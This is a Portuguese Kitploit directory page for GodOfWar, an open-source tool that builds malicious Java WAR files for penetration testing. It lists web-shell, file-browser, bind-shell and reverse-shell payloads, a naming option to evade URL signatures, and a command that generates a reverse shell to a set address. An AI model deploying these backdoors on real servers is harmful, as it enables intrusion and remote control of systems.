Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
godofwar — GodOfWar - Construtor malicioso de WAR Java com payloads embutidos | Kitploit
Ferramentas/GitHubGitHub/kingsabri/godofwar
Geração de PayloadsExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed TeamingDesenvolvimento de Payloads
GitHubkingsabri/godofwar

godofwar

GodOfWar - Construtor malicioso de WAR Java com payloads embutidos

Ver Repositório
12534há 7 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

GodOfWar - Construtor de WAR Java malicioso

Uma ferramenta de linha de comando para gerar payloads WAR para testes de penetração / red team, escrita em Ruby.

root@kitploit:~
                              .
                             hhh              
                            hhhhhhh           
                           hhhhhhhh        
                          hhhhhhhh+        
                         hhhhhhhh'           
                        hhhhhhhh.            
                       hhhhhhhhh             
        ..--          hhhhhhhhh             
      -sh/..  +.     hhhhhhhhh:              
      /+/:-/+ss-`   hhhhhhhhhh:               
      /MMM`ss:``.`  hhhhhhhhhh:              
     .MMMMM:        hhhhhhhhhhhhhhhhh:       
     MMMMMMM:        hhhhhhhhhhhhhhhh:      
     MMMMMMMMMMMMM:  hhhhhhhhhhhhhhhh`       
    :NNm:odh/oMMMNs. hhhhhhhhhhhhhhhh`       
   ./:`smdo+oos++-    `++sNMMMMMNmh+         
      .-y-`     ` :.  /   -dmddhhhhh-        
       o/-     `//o/ /M/   `+hhhhhhhh`       
      /o     :yosmy   +y  .`.hhhhhhhho       
      +`     /../.:      `.y::hhhhhs:`       
       `      `+yys`   .sy` /oohhy:          
                `/:s/-``     `.hh`           
               ..`     `       y+            
            .hNNmmNdymmmmds`   :-            
            hs.   ``..    :y-  `             
               -hhmNmddm+   .                
               `NMMMMMMm                     
                ` `oMMy                      
            `.     /Md-      :o  
           MMMMMMMMMMMMMMMMMMM:             
            MMMMMMMMMMMMMMMMMM:              
             MMMMMMMMMMMMMMMMM               
              MMMMMMMMMMMMMMM.               
              `MMMMMMMMMMMMM.                 
                :sNMMMNMdo:                  
                  ``+m:/-                    
                     `                                  
GodOfWar - Construtor de WAR Java malicioso.

Funcionalidades

  • Payloads pré-existentes. (tente -l/--list)
    • cmd_get
    • filebrowser
    • bind_shell
    • reverse_shell
    • reverse_shell_ui
  • Backdoor configurável. (tente --host/--port)
  • Controlo sobre o nome do payload.
    • Para evitar nomes maliciosos após a implantação e contornar assinaturas de nomes de URL.

Instalação

root@kitploit:~
$ gem install godofwar

Uso

root@kitploit:~
$ godofwar -h 

Menu de ajuda:
   -p, --payload PAYLOAD            Gera um WAR a partir de um dos payloads disponíveis.
                                        (consulte -l/--list)
   -H, --host IP_ADDR               Endereço IP local ou remoto para o payload escolhido
                                        (usado com -p/--payload)
   -P, --port PORT                  Porta local ou remota para o payload escolhido
                                        (usado com -p/--payload)
   -o, --output [FILE]              Ficheiro de saída e nome da implantação.
                                        (o padrão é o nome original do payload. consulte '-l/--list')
   -l, --list                       lista todos os payloads disponíveis.
   -h, --help                       Mostra esta mensagem de ajuda.

Exemplo

Listar todos os payloads

root@kitploit:~
$ godofwar -l
├── cmd_get
│   └── Informações:
│       ├── Descrição: Execução de comandos via interface web
│       ├── SO:          qualquer
│       ├── Configurações:    {"false"=>"No Settings required!"}
│       ├── Uso:       http://host/cmd.jsp?cmd=whoami
│       ├── Referências:  ["https://github.com/danielmiessler/SecLists/tree/master/Payloads/laudanum-0.8/jsp"]
│       └── Caminho local:  /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/cmd_get
├── filebrowser
│   └── Informações:
│       ├── Descrição: Navegador remoto de ficheiros, carregar, descarregar, descompactar ficheiros e execução nativa de comandos
│       ├── SO:          qualquer
│       ├── Configurações:    {"false"=>"No Settings required!"}
│       ├── Uso:       http://host/filebrowser.jsp
│       ├── Referências:  ["http://www.vonloesch.de/filebrowser.html"]
│       └── Caminho local:  /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/filebrowser
├── bind_shell
│   └── Informações:
│       ├── Descrição: Bind shell TCP
│       ├── SO:          qualquer
│       ├── Configurações:    {"port"=>4444, "false"=>"No Settings required!"}
│       ├── Uso:       http://host/reverse-shell.jsp
│       ├── Referências:  ["Metasploit - msfvenom -p java/jsp_shell_bind_tcp"]
│       └── Caminho local:  /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/bind_shell
├── reverse_shell_ui
│   └── Informações:
│       ├── Descrição: Reverse shell TCP com um formulário HTML para definir LHOST e LPORT a partir do navegador.
│       ├── SO:          qualquer
│       ├── Configurações:    {"host"=>"attacker", "port"=>4444, "false"=>"No Settings required!"}
│       ├── Uso:       http://host/reverse_shell_ui.jsp
│       ├── Referências:  []
│       └── Caminho local:  /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/reverse_shell_ui
├── reverse_shell
│   └── Informações:
│       ├── Descrição: Reverse shell TCP. LHOST e LPORT estão codificados
│       ├── SO:          qualquer
│       ├── Configurações:    {"host"=>"attacker", "port"=>4444, "false"=>"No Settings required!"}
│       ├── Uso:       http://host/reverse_shell.jsp
│       ├── Referências:  []
│       └── Caminho local:  /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/reverse_shell

Gerar payload com LHOST e LPORT

root@kitploit:~
godofwar -p reverse_shell -H 192.168.100.10 -P 9911 -o puppy

Após a implantação, pode visitar a sua shell em (http://host:8080/puppy/puppy.jsp)

Contribuir

  1. Faça um fork ( https://github.com/KINGSABRI/godofwar/fork ).
  2. Crie o seu branch de funcionalidade (git checkout -b my-new-feature).
  3. Faça commit das suas alterações (git commit -am 'Add some feature').
  4. Faça push para o branch (git push origin my-new-feature).
  5. Crie um novo Pull Request.

Adicionar Mais Backdoors

Para contribuir adicionando mais backdoors:

  1. crie uma nova pasta no diretório payloads.
  2. coloque o seu ficheiro jsp na pasta recém-criada (com o mesmo nome da pasta).
  3. atualize o ficheiro payloads_info.json com
    1. descrição.
    2. sistema operativo suportado (tente torná-lo universal, no entanto).
    3. configurações: host e porta padrão.
    4. referências: a origem do payload ou os créditos do seu criador.

Licença

A gem está disponível como código aberto sob os termos da Licença MIT.

Baixar ferramenta